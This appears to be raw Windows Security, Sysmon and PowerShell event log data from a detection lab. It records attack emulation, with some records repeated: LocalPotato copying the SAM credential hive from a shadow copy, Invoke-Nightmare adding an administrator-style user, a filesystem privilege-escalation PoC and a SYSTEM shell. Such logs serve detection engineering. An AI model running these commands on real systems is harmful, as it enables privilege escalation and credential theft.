4688 2 0 13312 0 0x8020000000000000 1034775 Security WIN10-21H1.snapattack.labs S-1-5-21-1538153195-943065003-848949206-1000 localuser WIN10-21H1 0x951dd5 0x1e84 C:\Users\localuser\filesystemeop\PoC-main\FilesystemEoPs\x64\Debug\FolderContentsDeleteToFolderDelete.exe %%1936 0xdc4 FolderContentsDeleteToFolderDelete.exe /target "C:\Config.msi" /initial C:\Programdata\Apple\Lockdown S-1-0-0 - - 0x0 C:\Windows\System32\cmd.exe S-1-16-12288 4688 2 0 13312 0 0x8020000000000000 1034775 Security WIN10-21H1.snapattack.labs S-1-5-21-1538153195-943065003-848949206-1000 localuser WIN10-21H1 0x951dd5 0x1e84 C:\Users\localuser\filesystemeop\PoC-main\FilesystemEoPs\x64\Debug\FolderContentsDeleteToFolderDelete.exe %%1936 0xdc4 FolderContentsDeleteToFolderDelete.exe /target "C:\Config.msi" /initial C:\Programdata\Apple\Lockdown S-1-0-0 - - 0x0 C:\Windows\System32\cmd.exe S-1-16-12288 11 2 4 11 0 0x8000000000000000 2754 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10.snapattack.labs - 2022-08-11 22:01:56.072 43199D79-7C53-62F5-070B-000000000E00 7532 C:\Users\Public\clfs.exe C:\Users\VGULLI~1\AppData\Local\Temp\wctA2C7.tmp.blf 2022-08-11 22:01:56.072 SNAPATTACK\vgullible 1 5 4 1 0 0x8000000000000000 17934 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2024-03-01 16:51:43.232 BD1BA16A-079F-65E2-E51C-000000001300 11164 C:\Windows\System32\cmd.exe 10.0.19041.746 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe C:\Windows\System32\cmd.exe C:\Users\patreides\ NT AUTHORITY\SYSTEM BD1BA16A-A04E-65D7-E703-000000000000 0x3e7 1 System MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18 BD1BA16A-A04E-65D7-0A00-000000001300 604 C:\Windows\System32\winlogon.exe winlogon.exe NT AUTHORITY\SYSTEM 1 5 4 1 0 0x8000000000000000 95141 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2023-02-15 18:00:02.638 BD1BA16A-1DA2-63ED-B20B-000000001000 9652 C:\Users\patreides\Desktop\LocalPotato.exe - - - - - .\LocalPotato.exe -i \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM -o \Windows\Temp\SAM.copy c:\Users\patreides\Desktop\ SNAPATTACK\snapattack BD1BA16A-1AA6-63ED-538C-1D0000000000 0x1d8c53 1 High MD5=17ACE376F8F3AC721EA75DB2BEDC105B,SHA256=3266B645BD8E2DB306C7BC426BC00865A5115A122066A1F4DE729A989E43CF95,IMPHASH=E1742EE971D6549E8D4D81115F88F1FC BD1BA16A-1CE7-63ED-AA06-000000001000 5360 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" SNAPATTACK\snapattack 4104 1 5 2 15 0x0 258676 Microsoft-Windows-PowerShell/Operational win10-base 1 1 Invoke-Nightmare -NewUser "snapattack" -NewPassword "P@ssw0rd" -DriverName "PrintMe" c449f5e5-eb99-43a7-af9a-468214db179b 1 5 4 1 0 0x8000000000000000 20816 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2023-09-07 14:36:56.212 BD1BA16A-E008-64F9-D628-000000001300 10060 C:\Windows\System32\cmd.exe 10.0.19041.746 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe C:\Windows\System32\cmd.exe /c whoami C:\Users\patreides\ SNAPATTACK\snapattack BD1BA16A-B700-64F8-9BA9-0E0000000000 0xea99b 1 Medium MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18 BD1BA16A-DFF3-64F9-D428-000000001300 444 C:\Users\patreides\minio.RELEASE.2023-01-31T02-24-19Z.exe "C:\Users\patreides\minio.RELEASE.2023-01-31T02-24-19Z.exe" server "http://quadra{1...2}.snapattack.labs/c/users/public/data-{1...2}" SNAPATTACK\snapattack 1 5 4 1 0 0x8000000000000000 17934 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2024-03-01 16:51:43.232 BD1BA16A-079F-65E2-E51C-000000001300 11164 C:\Windows\System32\cmd.exe 10.0.19041.746 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe C:\Windows\System32\cmd.exe C:\Users\patreides\ NT AUTHORITY\SYSTEM BD1BA16A-A04E-65D7-E703-000000000000 0x3e7 1 System MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18 BD1BA16A-A04E-65D7-0A00-000000001300 604 C:\Windows\System32\winlogon.exe winlogon.exe NT AUTHORITY\SYSTEM 1 5 4 1 0 0x8000000000000000 95141 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2023-02-15 18:00:02.638 BD1BA16A-1DA2-63ED-B20B-000000001000 9652 C:\Users\patreides\Desktop\LocalPotato.exe - - - - - .\LocalPotato.exe -i \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM -o \Windows\Temp\SAM.copy c:\Users\patreides\Desktop\ SNAPATTACK\snapattack BD1BA16A-1AA6-63ED-538C-1D0000000000 0x1d8c53 1 High MD5=17ACE376F8F3AC721EA75DB2BEDC105B,SHA256=3266B645BD8E2DB306C7BC426BC00865A5115A122066A1F4DE729A989E43CF95,IMPHASH=E1742EE971D6549E8D4D81115F88F1FC BD1BA16A-1CE7-63ED-AA06-000000001000 5360 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" SNAPATTACK\snapattack 4104 1 5 2 15 0x0 258676 Microsoft-Windows-PowerShell/Operational win10-base 1 1 Invoke-Nightmare -NewUser "snapattack" -NewPassword "P@ssw0rd" -DriverName "PrintMe" c449f5e5-eb99-43a7-af9a-468214db179b 1 5 4 1 0 0x8000000000000000 20816 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2023-09-07 14:36:56.212 BD1BA16A-E008-64F9-D628-000000001300 10060 C:\Windows\System32\cmd.exe 10.0.19041.746 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe C:\Windows\System32\cmd.exe /c whoami C:\Users\patreides\ SNAPATTACK\snapattack BD1BA16A-B700-64F8-9BA9-0E0000000000 0xea99b 1 Medium MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18 BD1BA16A-DFF3-64F9-D428-000000001300 444 C:\Users\patreides\minio.RELEASE.2023-01-31T02-24-19Z.exe "C:\Users\patreides\minio.RELEASE.2023-01-31T02-24-19Z.exe" server "http://quadra{1...2}.snapattack.labs/c/users/public/data-{1...2}" SNAPATTACK\snapattack 1 5 4 1 0 0x8000000000000000 20816 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2023-09-07 14:36:56.212 BD1BA16A-E008-64F9-D628-000000001300 10060 C:\Windows\System32\cmd.exe 10.0.19041.746 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe C:\Windows\System32\cmd.exe /c whoami C:\Users\patreides\ SNAPATTACK\snapattack BD1BA16A-B700-64F8-9BA9-0E0000000000 0xea99b 1 Medium MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18 BD1BA16A-DFF3-64F9-D428-000000001300 444 C:\Users\patreides\minio.RELEASE.2023-01-31T02-24-19Z.exe "C:\Users\patreides\minio.RELEASE.2023-01-31T02-24-19Z.exe" server "http://quadra{1...2}.snapattack.labs/c/users/public/data-{1...2}" SNAPATTACK\snapattack